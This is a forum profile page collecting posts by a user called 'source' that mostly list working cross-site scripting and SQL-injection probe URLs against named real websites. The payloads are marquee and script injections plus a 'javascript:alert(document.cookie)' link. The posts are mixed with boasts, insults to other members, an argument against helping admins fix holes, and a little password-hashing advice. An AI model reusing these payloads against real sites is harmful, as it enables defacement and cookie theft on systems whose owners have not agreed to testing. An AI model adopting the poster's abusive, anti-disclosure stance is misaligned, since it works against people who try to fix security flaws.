source

Members
  • Posts: 100
  • Joined
  • Last visited: Never

Everything posted by source

  1. http://themespot.info/?page=theme&themeid=%22%3E%3Cmarquee%3Elolz xssssss
  2. http://www.themafiaman.com/tru/board.php?brd=recruit&tru=10 http://www.themafiaman.com/tru/pimp.php?tru=10 both xssable I can't finish cause some stupid fuck face disabled my account. Anyway this is the LAST time you will see me make a post on these forums. I do not believe you should help admins fix security holes anymore. Open-source/full disclosure is bad. I discourage everyone from doing it. Agentsteal I hope you read this... Don't waste your time with this helping people fix security anymore. It's a complete waste of time. lolz
  3. first hole is in the register on step three if you put ">code as ur last name hit enter it runs. http://www.themafiaman.com/signup.php?step=4&email=%22%3E%3Cmarquee%3Elolz&referer= http://www.themafiaman.com/signup.php?step=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&email=lolwtf@aol.com&referer= http://themafiaman.com/signup.php?step=3&refer=%22%3E%3Cmarquee%3Elolz http://themafiaman.com/tru/board.php?tru=10&action=post xss in message... and I can make it link to say <a href="javascript:alert(document.cookie)">CLICK HERE</a>
  4. http://www.cutencuddly.org/letter/index.php?c=%22%3E%3Cbr%3E%3Cbr%3E%3Ch1%3ESource%20Is%201337%3C/h1%3E%3Cmarquee%3Efucked%3C/marquee%3E%3Ch1%3Eweak%20sekurite%20admin xss hole / sql hole
  5. dear admin: your security is a joke. you're not even using sessions.
  6. http://games4uonline.com/mymail/index.php?message=%3Cp%20align=center%3E%3Cfont%20face=Verdana%20size=2%20color=AF0001%3E%22%3E%3Cmarquee%3Eowndage%3C/font%3E%3C/p%3E
  7. if you link to a site that does not exist it will give you fclose errors or something like that. try to link to http://www.djaODJSKdjasKDjSKDADjASDK.com
  8. uhm hi i think i just pwnd ur site.. like on every page it says "expecting ending </marquee>" sorry about this roflmaolollercoptter
  9. criminals on the internet are using complex encryption methods..
  10. "I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly. Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less. It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar." I do not talk down to noobs. I hardly ever write anything besides posting exploits in the site itself. Surely if you did not want another one of my friendly responses you would not have posted, and attempted to troll me. Now if you say I've added nothing to this forum then you are a complete tard and made a false statement in your first line in saying that you read all of my posts. Now, stop trolling me.
  11. "Nice comeback !! lol" If only I *cared* or *liked* any of you. Or respected anyone on these forums, with the exception of one person.
  12. "virtually un crackable despite users pword strength" If you want true security you should be salting and md5ing/sha1 the passwords multiple times. Salt should be different for each user.
  13. "Take a couple of breaths before you freak out. If the OP does not care much about XSS (granted that he shouldn't post here and is wasting everybody's time), his loss. Although I must agree that inserting a marquee is only a tiny exploit. Try stealing a cookie using JavaScript or by loading an external entity (i.e. an image), then he has something to worry about." {snip} If you can use <marquee> you can steal cookies.
  14. same old same old: http://obb.awardspace.com/index.php?page=viewforum&forum=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&row=-1 http://obb.awardspace.com/index.php?page=newreply&forum=2&topic=%22%3E%3Cmarquee%3Elolz http://obb.awardspace.com/index.php?page=viewforum&forum=2&sort='
  15. if it's pre-made software then make sure it's up to date.
  16. "find little expoits or w/e like what source got" *source coughs then highlights little* an xss hole is NOT little. learn wtf you are talking about before you say "little"
  17. http://sparkcash.net/inside/profile.php xss in multiple fields http://sparkcash.net/signup.php?r=%22%3E%3Cmarquee%3Eownd xss probably a lot i missed, posting on these forums is boring, same old exploits on different sites.
  18. change the permissions on the directory. or add a password to it.
  19. http://www.businesstips101.com/news/yourageinseconds2.php?name=%22%3E%3Cmarquee%3Eownd&bornmonth=1&bornday=1&bornyear=1&action2=Submit
  20. http://www.zidub.com/searchinfo.php xssable http://www.zidub.com/register.php xssable by say, entering "><marquee>ownd as a username and just hitting enter. don't have much time tonight tho, i'll look at it later.
  21. http://speaker219.ath.cx:8080/URL-Encoder/test.php xss
  22. agentsteal. IMO dropping your postcount to TEN is bullshit. I mean, you've contributed soo much to these forums.
  23. I have found a cross site scripting vuln. When registering make your password <marquee>ownd and then register and on the next page where you echo the password it will echo. In short there should be no need for echoing the password. Ever.